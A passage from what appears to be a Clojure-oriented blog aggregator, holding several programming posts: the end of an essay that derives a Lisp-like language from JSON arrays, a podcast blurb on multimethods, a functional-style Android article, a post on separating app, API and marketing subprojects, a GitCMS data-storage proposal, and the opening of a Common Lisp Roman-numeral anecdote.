    if (!Array.isArray(ins)) {
      // this must be a primitive argument, like {x: 0, y: 0}
      return ins;
    }
    const [fName, ...args] = ins;
    return fns[fName](...args.map(parseInstruction));
  };
  data.instructions.forEach(parseInstruction);
})

Nice! We introduce a parseInstruction function. We can apply parseInstruction recursively to arguments, and support stuff like:

["rotate", ["rotate", ["drawLine", { x: 0, y: 0 }, { x: 1, y: 1 }], 90]]]

Very cool!

Further simplification

Okay, let’s look at our JSON again:

{
  instructions: [["drawLine", { x: 0, y: 0 }, { x: 1, y: 1 }]],
}

Well, our data only contains instructions. Do we really need a key called instructions?

What if we did this:

["do", ["drawLine", { x: 0, y: 0 }, { x: 1, y: 1 }]]

Instead of a top-level key, we could have a special instruction called do, which runs all the instructions it’s given.

Here’s one way we can implement it:

websocket.onMessage(data => { 
  const fns = {
    ...
    do: (...args) => args[args.length - 1],
  };
  const parseInstruction = (ins) => {
    if (!Array.isArray(ins)) {
      // this must be a primitive argument, like {x: 0, y: 0}
      return ins;
    }
    const [fName, ...args] = ins;
    return fns[fName](...args.map(parseInstruction));
  };
  parseInstruction(data);
})

Oh wow, that was easy. We just added do in fns. Now we can support an instruction like this:

[
  "do",
  ["drawPoint", { x: 0, y: 0 }],
  ["rotate", ["drawLine", { x: 0, y: 0 }, { x: 1, y: 1 }], 90]],
];

Even more power

Let’s make it more interesting. What if we wanted to support definitions?

const shape = drawLine({x: 0, y: 0}, {x: 1, y: 1}, 'red')
rotate(shape, 90)

If we could support definitions, our remote user could write some very expressive instructions! Let’s convert our code to the kind of data structure we’ve been playing with:

["def", "shape", ["drawLine", { x: 0, y: 0 }, { x: 1, y: 1 }]]
["rotate", "shape", 90]

Not bad! If we can support an instruction like that, we’d be golden! Here’s how:

websocket.onMessage(data => { 
  const variables = {};
  const fns = {
    ...
    def: (name, v) => {
      variables[name] = v;
    },
  };
  const parseInstruction = (ins) => {
    if (variables[ins]) {
      // this must be some kind of variable, like "shape"
      return variables[ins];
    }
    if (!Array.isArray(ins)) {
      // this must be a primitive argument, like {x: 0, y: 0}
      return ins;
    }
    const [fName, ...args] = ins;
    return fns[fName](...args.map(parseInstruction));
  };
  parseInstruction(data);
})

Here, we introduced a variables object, which keeps track of every variable we define. A special def function updates that variables object. Now we can run this instruction:

[
  "do",
  ["def", "shape", ["drawLine", { x: 0, y: 0 }, { x: 1, y: 1 }]],
  ["rotate", "shape", 90],
];

Not bad!

Extreme Power: Goal

Let’s step it up a notch. What if we let our remote user define their own functions?

Say they wanted to write something like this:

const drawTriangle = function(left, top, right, color) { 
   drawLine(left, top, color);
   drawLine(top, right, color); 
   drawLine(left, right, color); 
} 
drawTriangle(...)

How would we do it? Let’s follow our intuition again. If we transcribe this to our data representation, here’s how it could look:

  ["def", "drawTriangle",
  ["fn", ["left", "top", "right", "color"],
    ["do",
      ["drawLine", "left", "top", "color"],
      ["drawLine", "top", "right", "color"],
      ["drawLine", "left", "right", "color"],
    ],
  ],
],
["drawTriangle", { x: 0, y: 0 }, { x: 3, y: 3 }, { x: 6, y: 0 }, "blue"],

Here,

const drawTriangle = ...

translates to

["def", "drawTriangle", …]. 

And

function(left, top, right, color) {…}

translates to

["fn", ["left", "top", "right", "color"], ["do" ...]]

All we need to do is to parse this instruction somehow, and bam, we are good to go!

Extreme Power: Key

The key to making this work is our ["fn", …] instruction. What if we did this:

const parseFnInstruction = (args, body, oldVariables) => {
  return (...values) => {
    const newVariables = {
      ...oldVariables,
      ...mapArgsWithValues(args, values),
    };
    return parseInstruction(body, newVariables);
  };
};

When we find a fn instruction, we run parseFnInstruction. This produces a new javascript function. We would replace drawTriangle here with that function:

["drawTriangle", { x: 0, y: 0 }, { x: 3, y: 3 }, { x: 6, y: 0 }, "blue"]

So when that function is run, values would become:

[{ x: 0, y: 0 }, { x: 3, y: 3 }, { x: 6, y: 0 }, "blue"]

After that,

const newVariables = {...oldVariables, ...mapArgsWithValues(args, values)}

Would create a new variables object, that includes a mapping of the function arguments to these newly provided values:

const newVariables = {
  ...oldVariables,
  left: { x: 0, y: 0 }, 
  top: { x: 3, y: 3 },
  right: {x: 6, y: 0 }, 
  color: "blue", 
}

Then, we can take the function body, in this case:

      [
        "do",
        ["drawLine", "left", "top", "color"],
        ["drawLine", "top", "right", "color"],
        ["drawLine", "left", "right", "color"],
      ],

And run it through parseInstruction, with our newVariables. With that "left" would be looked up as a variable and map to {x: 0, y: 0}.

If we did that, voila, the major work to support functions would be done!

Extreme Power: Execution

Let’s follow through on our plan. The first thing we need to do is to have parseInstruction accept variables as an argument. To do that, we need to update parseInstruction, and wherever it's called:

  const parseInstruction = (ins, variables) => {
    ...
    return fn(...args.map((arg) => parseInstruction(arg, variables)));
  };
  parseInstruction(data, variables);

Next, we’ll want to add a special check to detect if we have a “fn” instruction:

  const parseInstruction = (ins, variables) => {
    ...
    const [fName, ...args] = ins;
    if (fName == "fn") {
      return parseFnInstruction(...args, variables);
    }
    ...
    return fn(...args.map((arg) => parseInstruction(arg, variables)));
  };
  parseInstruction(data, variables);

Now, our parseFnInstruction:

const mapArgsWithValues = (args, values) => { 
  return args.reduce((res, k, idx) => {
    res[k] = values[idx];
    return res;
  }, {});
}
const parseFnInstruction = (args, body, oldVariables) => {
  return (...values) => {
    const newVariables = {...oldVariables, ...mapArgsWithValues(args, values)}
    return parseInstruction(body, newVariables);
  };
};

It works exactly like we said. We return a new function. When it’s run, it:

  1. Creates a newVariables object, that associates the args with values
  2. runs parseInstruction with the body and the new variables object

Okay, almost done. The final bit to make it all work:

  const parseInstruction = (ins, variables) => {
    ...
    const [fName, ...args] = ins;
    if (fName == "fn") {
      return parseFnInstruction(...args, variables);
    }
    const fn = fns[fName] || variables[fName];
    return fn(...args.map((arg) => parseInstruction(arg, variables)));

The secret is this:

    const fn = fns[fName] || variables[fName];

Here, since fn can now come from both fns and variables, we check both. Put it all together, and it works!

websocket.onMessage(data => { 
  const variables = {};
  const fns = {
    drawLine: drawLine,
    drawPoint: drawPoint,
    rotate: rotate,
    do: (...args) => args[args.length - 1],
    def: (name, v) => {
      variables[name] = v;
    },
  };
  const mapArgsWithValues = (args, values) => {
    return args.reduce((res, k, idx) => {
      res[k] = values[idx];
      return res;
    }, {});
  };
  const parseFnInstruction = (args, body, oldVariables) => {
    return (...values) => {
      const newVariables = {
        ...oldVariables,
        ...mapArgsWithValues(args, values),
      };
      return parseInstruction(body, newVariables);
    };
  };
  const parseInstruction = (ins, variables) => {
    if (variables[ins]) {
      // this must be some kind of variable
      return variables[ins];
    }
    if (!Array.isArray(ins)) {
      // this must be a primitive argument, like {x: 0, y: 0}
      return ins;
    }
    const [fName, ...args] = ins;
    if (fName == "fn") {
      return parseFnInstruction(...args, variables);
    }
    const fn = fns[fName] || variables[fName];
    return fn(...args.map((arg) => parseInstruction(arg, variables)));
  };
  parseInstruction(data, variables);
})

Holy jeez, with just this code, we can parse this:

[
  "do",
  [
    "def",
    "drawTriangle",
    [
      "fn",
      ["left", "top", "right", "color"],
      [
        "do",
        ["drawLine", "left", "top", "color"],
        ["drawLine", "top", "right", "color"],
        ["drawLine", "left", "right", "color"],
      ],
    ],
  ],
  ["drawTriangle", { x: 0, y: 0 }, { x: 3, y: 3 }, { x: 6, y: 0 }, "blue"],
  ["drawTriangle", { x: 6, y: 6 }, { x: 10, y: 10 }, { x: 6, y: 16 }, "purple"],
]

We can compose functions, we can define variables, and we can even create our own functions. If we think about it, we just created a programming language! [1]

Try it out

Here’s an example of our triangle 🙂

And here’s a happy person!

Surprises

We may even notice something interesting. Our new array language has advantages over JavaScript itself!

Nothing special

In JavaScript, you define variables by writing const x = foo. Say you wanted to “rewrite” const to be just c. You couldn’t do this, because const x = foo is special syntax in JavaScript. You’re not allowed to change that around.

In our array language though, there’s no syntax at all! Everything is just arrays. We could easily write some special c instruction that works just like def.

If we think about it, it’s as though in JavaScript we are guests, and we need to follow the language designer’s rules. But in our array language, we are “co-owners”. There is no big difference between the “built-in” stuff (“def”, “fn”) the language designer wrote and the stuff we write (“drawTriangle”)!

Code is Data

There’s another, much more resounding win. If our code is just a bunch of arrays, we can do stuff to the code. We could write code that generates code!

For example, say we wanted to support unless in Javascript.

Whenever someone writes

unless foo { 
   ...
}

We can rewrite it to

if !foo { 
   ...
}

This would be difficult to do. We’d need something like Babel to parse our file, and work on top of the AST to make sure we rewrite our code safely to

if !foo { 
  ...
}

But in our array language, our code is just arrays! It’s easy to rewrite unless:

function rewriteUnless(unlessCode) {
   const [_unlessInstructionName, testCondition, consequent] = unlessCode; 
   return ["if", ["not", testCondition], consequent]
}
rewriteUnless(["unless", ["=", 1, 1], ["drawLine"]])
// => 
["if", ["not", ["=", 1, 1]], ["drawLine"]];

Oh my god. Easy peasy.

Editing with Structure

Having your code represented as data doesn’t just allow you to manipulate your code with ease. It also allows your editor to do it too. For example, say you are editing this code:

["if", testCondition, consequent]

You want to change testCondition to ["not", testCondition]

You could bring your cursor over to testCondition

["if", |testCondition, consequent]

Then create an array

["if", [|] testCondition, consequent]

Now you can type “not”

["if", ["not", |] testCondition, consequent]

If your editor understood these arrays, you can tell it: “expand” this area to the right:

["if", ["not", testCondition], consequent]

Boom. Your editor helped you change the structure of your code.

If you wanted to undo this, you can put your cursor beside testCondition,

["if", ["not", |testCondition], consequent]

and ask the editor to “raise” this up one level:

["if", testCondition, consequent]

All of a sudden, instead of editing characters, you are editing the structure of your code. This is called structural editing [2]. It can help you move with the speed of a potter, and is one of the many wins you’ll get when your code is data.

What you discovered

Well, this array language you happened to have discovered…is a poorly implemented dialect of Lisp!

Here’s our most complicated example:

[
  "do",
  [
    "def",
    "drawTriangle",
    [
      "fn",
      ["left", "top", "right", "color"],
      [
        "do",
        ["drawLine", "left", "top", "color"],
        ["drawLine", "top", "right", "color"],
        ["drawLine", "left", "right", "color"],
      ],
    ],
  ],
  ["drawTriangle", { x: 0, y: 0 }, { x: 3, y: 3 }, { x: 6, y: 0 }, "blue"],
  ["drawTriangle", { x: 6, y: 6 }, { x: 10, y: 10 }, { x: 6, y: 16 }, "purple"],
]

And here’s how that looks in Clojure, a dialect of lisp:

(do 
  (def draw-triangle (fn [left top right color]
                       (draw-line left top color)
                       (draw-line top right color)
                       (draw-line left right color)))
  (draw-triangle {:x 0 :y 0} {:x 3 :y 3} {:x 6 :y 0} "blue")
  (draw-triangle {:x 6 :y 6} {:x 10 :y 10} {:x 6 :y 16} "purple"))

The changes are cosmetic:

  • () now represent lists
  • We removed all the commas
  • camelCase became kebab-case
  • Instead of using strings everywhere, we added one more data type: a symbol
    • A symbol is used to look stuff up: i.e. "drawTriangle" became draw-triangle

The rest of the rules are the same:

(draw-line left top color)

means

  • Evaluate left, top, color, and replace them with their values
  • Run the function draw-line with those values

Discovery?

Now, if we agree that the ability to manipulate source code is important to us, what kind of languages are most conducive for supporting it?

One way we can solve that question is to rephrase it: how could we make manipulating code as intuitive as manipulating data within our code? The answer sprouts out: Make the code data! What an exciting conclusion. If we care about manipulating source code, we glide into the answer: the code must be data [3].

If the code must be data, what kind of data representation could we use? XML could work, JSON could work, and the list goes on. But, what would happen if we tried to find the simplest data structure? If we keep simplifying, we glide into the simplest nested structure of all…lists!

This is both illuminating and exciting.

It’s illuminating, in the sense that it seems like Lisp is “discovered”. It’s like the solution to an optimization problem: if you care about manipulating code, you gravitate towards discovering Lisp. There’s something awe-inspiring about using a tool that’s discovered: who knows, alien life-forms could use Lisp!

It’s exciting, in that, there may be a better syntax. We don’t know. Ruby and Python in my opinion were experiments, trying to bring lisp-like power without the brackets. I don’t think the question is a solved one yet. Maybe you can think about it 🙂

Fin

You can imagine how expressive you can be if you can rewrite the code your language is written in. You’d truly be on the same footing as the language designer, and the abstractions you could write at that level, can add up to save you years of work.

All of a sudden, those brackets look kind of cool!


Thanks to Daniel Woelfel, Alex Kotliarskyi, Sean Grove, Joe Averbukh, Irakli Safareli, for reviewing drafts of this essay

[1]

We can, of course, write the Y Combinator with it too!

[2]

Cursive’s doc has a great demo of this.

[3]

JavaScript has tried to support macros with sweet.js for example. However, you can see that manipulating source code there is still less intuitive than manipulating data with your code.

Permalink

Ep 087: Polymorphic Metal

Each week, we discuss a different topic about Clojure and functional programming.

If you have a question or topic you’d like us to discuss, tweet @clojuredesign, send an email to feedback@clojuredesign.club, or join the #clojuredesign-podcast channel on the Clojurians Slack.

This week, the topic is: “multimethods.” We discuss polymorphism and how we tackle dynamic data with families of functions.

Selected quotes:

  • “You don’t have to reach for polymorphism as quickly in Clojure.”
  • “Polymorphism at its simplest.”
  • “A natural fit for processing a list of heterogeneous things.”
  • “Our natural tool of computation: the function.”

Links:

Permalink

Approaching Pure Functional Programming in Android Apps

Is it possible to write purely functional Android apps? Many argue for Flutter, React Native, and lately Jetpack Compose due to their declarative style, but are they really necessary, or can we do the same by utilising the full power of the Android ecosystem?

I will not go much into what functional programming is. There are already many blog posts about replacing var with val, using LiveData as atoms instead of var, copying objects instead of mutating them, etc. They solve a lot of problems, but they're not truly functional. Unless you know what you are doing, your MutableLiveData might as well be a var and your .copy() might as well be a mutation.

We will approach the topic using this app as an example: Phrase Reminder.
It’s a very simple app where you can save phrases and their translation while learning a language.

https://medium.com/media/c0b9c63edc51386561367a031bfde518/href

The full source of the app is here: https://github.com/TorkelV/PhraseReminder
It has many more features and has been refactored many times since writing this article, in a continuous effort to make it as functional as possible.

Let’s code

First off we need a simple project with a main activity to show a fragment. I will assume you already know how to do that.

We create a simple domain model:

https://medium.com/media/06395324e324d5d3a3790dd24d15395e/href

We need a database to save our phrases:

https://medium.com/media/fcd56c4e9e9e9ab3b26465d0480c05f6/href

We set up a simple preferenceService with the recently released androidx DataStore:

https://medium.com/media/74ed3d530af854df6454f3167bea5cbe/href

We need a view model:

https://medium.com/media/5cf47b4bcd601389abc97848e07da6ae/href

We need some DI to inject our stuff:

https://medium.com/media/266b363d396aa4503ba46c6686a97328/href

Let’s enable data binding and set up a layout and bind our viewmodel:

https://medium.com/media/ea178eaad4a8870c399abaae5d97e61b/href

And create our Fragment and hook up the binding.

https://medium.com/media/905901ce9a28fcf54379085fbfd13058/href

Some pretty standard stuff so far..

Let’s modify our viewModel a bit, to get the current group and the phrases from that group.

https://medium.com/media/10a17ea240f4092d72996225fdf950ab/href

Now think about where you want to go from here. We have a database. We have databinding set up, we have a preference service that can return flows. We have our phrases flowing into the viewModel from the db, and it automatically filters them based on the active group!

Do you think we need to write an adapter to show our phrases?

Nope.

First off let’s add this dependency:

implementation("me.tatarka.bindingcollectionadapter2:bindingcollectionadapter-recyclerview:4.0.0")

Create a layout to display a phrase(simplified):

https://medium.com/media/572bf4aa71e80d46ac1a5aca942cc51b/href

Add an ItemBinding to our viewmodel.

https://medium.com/media/2865ed38a5bbfb27da6ac8e4d331e7ec/href

Add itemBinding and items to the recyclerView in our fragment layout:

https://medium.com/media/768b6e115dd5d641afbb51a4cbda1e2f/href

Now we have our phrases essentially flowing into the recycler view. Even though the db is empty at the moment. Let’s add some phrases!

Simply add two MutableLiveData to the view model:

https://medium.com/media/af53858b95193058d54fece3cf937d89/href

And two input fields to our fragment layout with an inverse binding:

https://medium.com/media/8bfb2e78d4495f87422dd7b208ebf3fe/href

We add a new function to add a phrase:

https://medium.com/media/2e0e87b9efeafbd1eeedb5e6f1de92d8/href

And add a button to our layout:

https://medium.com/media/05849646d7bf6dd0f4b2a565bd355705/href

You do not necessarily have to create the mutable live data, you could reference the views directly, but this way is cleaner IMO.
We can, for example, add a validation function:

Let’s add a livedata extension library to make our job a bit easier:

implementation("com.github.c-b-h:lives:1.0.0")
https://medium.com/media/3758e70f822d2fd05482226776e77327/href
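
The article's validation uses the lives extensions added above; as a dependency-free alternative, roughly the same thing can be sketched with a plain MediatorLiveData (canAddNewPhrase matching the name used in the android:enabled binding mentioned next):

import androidx.lifecycle.MediatorLiveData

// True only when both inputs are non-blank; re-evaluated whenever either changes.
val canAddNewPhrase = MediatorLiveData<Boolean>().apply {
    fun validate() {
        value = !phraseText.value.isNullOrBlank() && !translationText.value.isNullOrBlank()
    }
    addSource(phraseText) { validate() }
    addSource(translationText) { validate() }
}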

Now we can add android:enabled="@{viewModel.canAddNewPhrase}" to our button.

We could also add a search field in the same manner.

https://medium.com/media/edb53e17ecaced8dd7bbea33cc39d476/href

Just swap out phrases for displayedPhrases in the recycler view and it will automatically show the phrases that match the search.
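
One way to sketch that filtering, assuming a search MutableLiveData bound two-way to the new field and reusing the names from the earlier view-model sketches:

import androidx.lifecycle.MutableLiveData
import androidx.lifecycle.asFlow
import androidx.lifecycle.asLiveData
import kotlinx.coroutines.flow.combine

// Bound two-way to the search input.
val search = MutableLiveData("")

// Re-filters whenever either the phrase list or the search text changes.
val displayedPhrases = phrases.asFlow()
    .combine(search.asFlow()) { list, query ->
        list.filter { it.text.contains(query, ignoreCase = true) }
    }
    .asLiveData()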

Cleaning up a bit

It’s not very nice to have multiple mutable values lying around in the view model. We can refactor it to encapsulate some behaviour.

First we create a separate class for our “view”:

https://medium.com/media/3f1c804a8738155d36de9cf7d1e4d688/href

We don’t tell it where to add a phrase, as we could reuse this component to add sub/related phrases to a phrase later.

We create an instance of this in our view model:

https://medium.com/media/cc4e2b72e65fa126c94fef61ec6038f2/href
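
A sketch of both steps with illustrative names: the component owns the input state and the blank-check, and takes what to do on submit as a constructor argument, so the view model decides where the phrase goes.

import androidx.lifecycle.MutableLiveData
import kotlinx.coroutines.CoroutineScope
import kotlinx.coroutines.flow.first
import kotlinx.coroutines.launch

class AddPhraseView(
    private val scope: CoroutineScope,
    private val onAdd: suspend (text: String, translation: String) -> Unit
) {
    val phraseText = MutableLiveData("")
    val translationText = MutableLiveData("")

    fun submit() {
        val text = phraseText.value.orEmpty()
        val translation = translationText.value.orEmpty()
        if (text.isBlank() || translation.isBlank()) return
        scope.launch {
            onAdd(text, translation)
            phraseText.value = ""
            translationText.value = ""
        }
    }
}

// Inside the view model: this instance adds phrases to the currently active group.
val addPhraseView = AddPhraseView(viewModelScope) { text, translation ->
    dao.insert(Phrase(text = text, translation = translation, groupId = prefs.activeGroup().first()))
}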

Instead of a submit button, we’ll just use an IME action.

First we’ll add a binding adapter for it:

https://medium.com/media/30ddfa8e92a8b1b3227e22460703c373/href
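
A sketch of such a binding adapter; onImeAction is a made-up attribute name, and the IME_ACTION_DONE check is an assumption about which action the input uses.

import android.view.inputmethod.EditorInfo
import android.widget.TextView
import androidx.databinding.BindingAdapter

// Lets a layout bind a handler to the keyboard's "done" action,
// e.g. something like app:onImeAction="@{() -> viewModel.addPhraseView.submit()}".
@BindingAdapter("onImeAction")
fun TextView.setOnImeAction(action: () -> Unit) {
    setOnEditorActionListener { _, actionId, _ ->
        if (actionId == EditorInfo.IME_ACTION_DONE) {
            action()
            true
        } else {
            false
        }
    }
}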

And then we create a layout for the component:

https://medium.com/media/1c2ea5c337a1b5babd02915fab3d115a/href

And include that layout in our fragment layout:

https://medium.com/media/008bec5659cee19118abea38460d7b15/href

Much better 😄 Our view model is cleaner and we have a reusable component that we can test more easily. You could make it even nicer by refactoring the TextInputLayouts into components as well.

Changing phrase groups:

In Phrase Reminder we also have multiple lists/groups of phrases, so you can switch between different languages, for example. This can be solved similarly to how we added phrases. We could add a drawer menu in the main activity where you can add new groups, and just by calling prefs.setActiveGroup(id) the group flow in our fragment's view model will emit a new value, the phrases query will be run again, and our view will automatically be updated with the phrases in that group. In that way the activity and fragment are fully decoupled, but can still “communicate” through the data store.

What’s the point?

In these examples we perform no side effects on our app state directly. The only side effects are the text inputs coming from the view; all the other side effects happen inside the database. (Sometimes exceptions to this are necessary, for example when you want to hide/show a view based on an action but don't want it to persist. In that case we try to encapsulate it as much as possible.)

There is no init { loadPhrases() } or similar code where you have to deal with updating or refreshing data after changes. We do not modify our intermediate state; it is only refreshed through a flow from our repository.
We do not rely on custom observers, and we do not modify the view outside of binding adapters. We do not deal with custom adapters or with any intermediate state outside of the viewModel.

If you set up a gRPC API and use streams, you could write the code in the same way; the only difference would be the location of the repository.

The same goes for Firestore: you could create a callback flow from a snapshot listener and achieve the same functionality.

Conclusion

As long as all data flows into your view model, and mutations only happen remotely and then flow back into your app, you can essentially write everything else with pure functions. Is it practical, however? Probably not. Some side effects are just better off placed in intermediate state, and then we have to call that void function that just changes an in-memory boolean. I still think it's beneficial to think in a functional way whenever you implement anything, and I would strongly recommend learning a language like Clojure if you want to get into that mindset.

Anyway, we have shown that using only the Android SDK we can write fully reactive applications that have nearly all the perks of the declarative frameworks, while still keeping all the perks of the non-declarative world and all native features.

Nor is this just an experiment. In the apps I develop I do not write more than a few lines of code in any fragment or activity; everything can be solved reactively through the view model and binding adapters.

👋 If there is any interest in this post, I might write a part 2 expanding on the topic with more complex examples.

In the meantime you can check out the source of PhraseReminder: https://github.com/TorkelV/PhraseReminder


Approaching Pure Functional Programming in Android Apps was originally published in The Startup on Medium, where people are continuing the conversation by highlighting and responding to this story.

Permalink

My Project Umbrella

Last Updated on October 22, 2020 by Brad Cypert

I was talking with a friend the other day about Flutter for Web's SEO, which… is not very good. He asked if I was concerned about search engines not being able to find my app, to which I said “No.” My Flutter app is behind a login, so Google wouldn't be able to index anything behind the login anyway, but that's not why I'm not concerned. I still want people to find my app, but I handle how they find the app in a way that separates several different concerns. I call it my “Project Umbrella”.

When I build an “App”, there are three other projects that roll up into that “App” (I also refer to this as the Brand). For example, Bluejay.app consists of three pieces — A web server, a client side application, and a marketing site. These three subprojects make up my standard project (or Brand) at this point.

With Bluejay, I don’t want search engines to index my API (why would I?) and my client side application contains data specific to whoever is logged in (also something that I don’t want indexed for privacy reasons). However, I do want people to stumble upon the project, the project’s blog posts, and similar pages.

The tech side of this is extremely simple (at a high level). I have a web server written in Go. I have a client side application written in React. I have a marketing site built with Gatsby. This separation of concerns means a lot to me (and ideally my users). It means that my marketing materials don’t get shipped alongside my app (you don’t need to download my marketing images and content if you just want to use the app). Additionally, since the client apps and backend servers are separated, I’m not spending CPU cycles on serving static assets or stitching together web pages with some templating library.

My Go server only responds to GraphQL and will only render GraphQL JSON responses. My client side app is served via Netlify and their CDN, which helps me get insanely fast load times. In this project, the marketing site is a static website that is also served via Netlify for the same reason.

The Flutter app that started this conversation follows the same pattern, although the tech is slightly different. On the web server side, I’m currently using Firebase for storage, firestore, and functions. On the client side, I build out an extremely not-SEO-friendly Flutter web app, and an iOS and Android app. To keep everything close, I chose to use Firebase to deploy the Flutter web app, although Netlify would work here too. Finally, the marketing site is WordPress, although it could be Gatsby, plain HTML, or whatever.

Separating my concerns out like this makes it extremely easy to overhaul one piece of the Brand/Project without drastically affecting the other pieces. For example, if I want to swap React for Vue, I only have to do that on the client-side project. More interestingly, if I swap React for ClojureScript, I only have to do that in the client side project, and I don’t have to modify any additional build pipelines (or find a way to make my web server compile Clojure to JavaScript on the fly).

Accessing the Subprojects

The golden standard I follow that allows this to work is actually fairly straightforward. My projects are linked to and communicate with their partner projects through three things: DNS entries, hyperlinks, and JSON as the communication standard.

Generally, I follow the idea that my marketing site should live at “www.xyz.com”, my app should live at “app.xyz.com” and my server-side API lives at “api.xyz.com”. There are some exceptions to this, however. Notably, if I end up buying a .app domain instead of a .com domain, “app.xyz.app” feels weird. Bluejay and Luna Journal are both good examples of this. Here’s how I structure their DNS records:

  • Bluejay:
  • Luna Journal
    • Marketing site lives at www.lunajournal.app
    • The API is handled by Firebase and I do not have to manage DNS records for it
    • The client side (web) application lives at my.lunajournal.app
      • I chose “my” specifically because Luna Journal helps you manage your pet’s information.
    • The mobile apps are available via the App Store.

Why?

I understand that there are dozens (hundreds, maybe?) of other ways to effectively build Web/Mobile apps and the services that support them. I’ve found that this pattern works best for me, as it helps me build apps that support my values and beliefs.

Namely, I believe that I should be able to separate my client side from the web server for scalability and decoupling reasons. I also believe that your client-side experience should be fast. Marketing sites are full of images and images drastically increase the size of a webpage. Finally, I believe that I shouldn’t be the reason you hit your mobile phone’s data cap. Building my applications in this way helps me ensure that I code against my values and ensure that, as a user, you get a fast, considerate experience that scales well under pressure.

The post My Project Umbrella appeared first on Brad Cypert.

Permalink

How Git Could Help Save the Open Web

I think we need a protocol for storing and accessing an individual's data on the web. If it became widely adopted, open-source web applications would become more prevalent, and we'd be able to achieve the goals described in Protocols, Not Platforms.

Here's a simple proposal which I'll call GitCMS. It relies on Git, EDN, and Clojure Spec.

(For those unfamiliar with Clojure: EDN is basically an improved version of JSON, and Spec is a language for defining schemas.)

Core proposal

Storage and data model

Each user has at least one Git repo, in which each file contains a single document. The document is stored as an EDN map, optionally followed by a blank line and some text. For example, my repo might contain a blog post in the file /blog/some-blog-post:

{:type      :article
 :title     "Some Blog Post"
 :published #inst "2020-10-10"}

Lorem ipsum dolor sit amet...

When reading, this file would be deserialized to:

{:type      :article
 :title     "Some Blog Post"
 :published #inst "2020-10-10"
 :path      "/blog/some-blog-post"
 :text      "Lorem ipsum dolor sit amet..."}

:path is the primary key.

These documents could be used for any kind of data. Besides modeling content you've created, you could model other content you've interacted with. If you like a Tweet, you might model that like so:

{:path   "/events/<some uuid>"
 :type   :rating
 :url    "..."
 :rating :like
 :date   #inst "..."}

For large files like images or videos, or frequently changing files like collaborative documents, you could store just the metadata and a foreign key/URL pointing to the content.

The community could maintain a special repository that contains schemas, defined with Spec. For example:

(ns example.schemas
  (:require
    [clojure.spec.alpha :as s]))

(s/def :article/type #{:article})
(s/def ::title string?)
(s/def ::article
  (s/keys :req-un [:article/type
                   ::title
                   ...]))

In English: to be an article, a document must have a :type key set to :article, it must have a :title key set to a string, etc.

So if you want to make an application that publishes a user's blog posts, you would filter through their repo for any documents that match the spec for articles.

(If your app is written in Clojure, you can use the official Spec definitions directly, but that's not required. They're just a reference implementation. The schemas don't even have to be written with Spec, but that seems like a flexible, concise, unambiguous way to do it.)

Access

To make an application that reads GitCMS data, just ask the user for their repo's URL. If you need write access, ask the user for an SSH key (on Github, "Deploy key"). As a user, you can make additional repos for more granular access control (e.g. besides a public repo, you could have a private repo which requires an SSH key for read access).

For more convenient and finer-grained control, there could be applications which have full access to your repo and provide an OAuth API for other apps. These API layers could do more things too, like maintain an index of your data in order to provide efficient queries. The specifics don't need to be part of the GitCMS protocol.

Git also lends itself well to change data capture. Applications can poll (or use Git hooks) for new commits. Given a batch of new commits, you can easily see which documents have been created, updated or deleted.

Benefits

Do one thing and do it well

I'll use Jira as an example. Jira was not loved at my previous job. My project manager said it was popular mainly because it was the only issue tracker that did everything. (If you disagree, think of some other web app that does many things poorly).

With GitCMS, you can easily have multiple apps that operate on the same data, without API integrations. You could have one app for creating new issues and a separate app for displaying those issues. Poor features, instead of being tolerated, can be replaced with small, specialized apps.

This would also lower the barrier to entry for individual developers and startups: instead of having to make an app that's good enough to displace an incumbent, you can make a small app that only replaces one feature. And you can do this without plugging into (and thus, becoming dependent on) a commercial platform.

Open data

Information discovery is one of the most important problems of our time. If everyone used GitCMS to store data about content they like and don't like, then anyone could use it to build search engines, recommender systems and social networks.

Adoption

Getting people to use any new protocol is hard, but I think GitCMS has a real chance to succeed. Git is widely used and understood, and there's plenty of free hosting. Plus it's convenient for developers: you can perform CRUD operations with just a text editor. Even without widespread adoption, GitCMS would be a nice data storage format for many side projects, like static site generators. GitCMS will benefit from network effects, but it can get started without them.

If GitCMS becomes popular among developers, it can spread to non-technical people with some extra work. At the least, we would need a hosting service designed for this purpose instead of GitHub et al.

The choice of EDN instead of JSON will probably hinder adoption, except among Clojure programmers. However I think the advantages of EDN are significant, and switching to it late-stage would be difficult. So I'm confident that this indulgence is worth it. It'd be good to survey the state of EDN implementations and see if any could use some help.

I personally got chills when the idea for GitCMS coalesced in my mind, so I'll be using it for my future side projects (which I will no doubt promote as "X, built on GitCMS"). I'll also let Findka users expose their favorited articles in an RSS feed, which can then be auto-imported into GitCMS. If you want to use GitCMS, let me know (you can find contact info and social media profiles on my website). If others are interested, I could set up a mailing list.

Permalink

Standard Joke

Arabic-to-Roman number conversion is a common programming exercise, often used as a TDD exercise. It is an exercise on many Exercism.IO [1] language tracks including my own track for Common Lisp [2].

So how do you solve this in some arbitrary programming language?

Typically people write some code to loop through a mapping of numeric values to roman numeral digits and do repeated decrements while accumulating the roman numeral digits. That is to say, if you start with 1970 and your mapping contains 1000 => "M"; 900 => "CM"; 500 => "D", you decrement by 1000 and accumulate "M"; then, since the resulting number is under 1000, you try the next mapping, decrement by 900 and accumulate "CM", etc.
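
For concreteness, that typical greedy approach might look like this (a sketch in Kotlin, since the point is that it takes real code in most languages):

fun toRoman(number: Int): String {
    // Value/numeral pairs from largest to smallest, including the subtractive forms.
    val mapping = listOf(
        1000 to "M", 900 to "CM", 500 to "D", 400 to "CD",
        100 to "C", 90 to "XC", 50 to "L", 40 to "XL",
        10 to "X", 9 to "IX", 5 to "V", 4 to "IV", 1 to "I"
    )
    var remaining = number
    return buildString {
        for ((value, numeral) in mapping) {
            // Repeatedly decrement and accumulate while this value still fits.
            while (remaining >= value) {
                remaining -= value
                append(numeral)
            }
        }
    }
}

// toRoman(1970) == "MCMLXX"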

How do you do this in Common Lisp?

(format t "~@r" 1970)

Yes: Built. In. To. The. Language. (In fact, using ~@:r will produce output in the alternate roman numeral format, which does not have special cases for numbers like 4; i.e. it will output “IIII” rather than “IV”.)

Common Lisp [3] is a language with an ANSI specification [4]. The specification process ran from the early-to-mid 1980s to the mid-1990s. Its goal was to create a single “common” Lisp collecting the good bits from all the splintered Lisp languages used at the time. I’ve heard that it involved a good amount of “horse-trading” as each interested party tried to get the resulting language to contain their special or idiosyncratic feature. So how did it come to have this odd feature?

With a little digging I have found the real story: It was a joke.

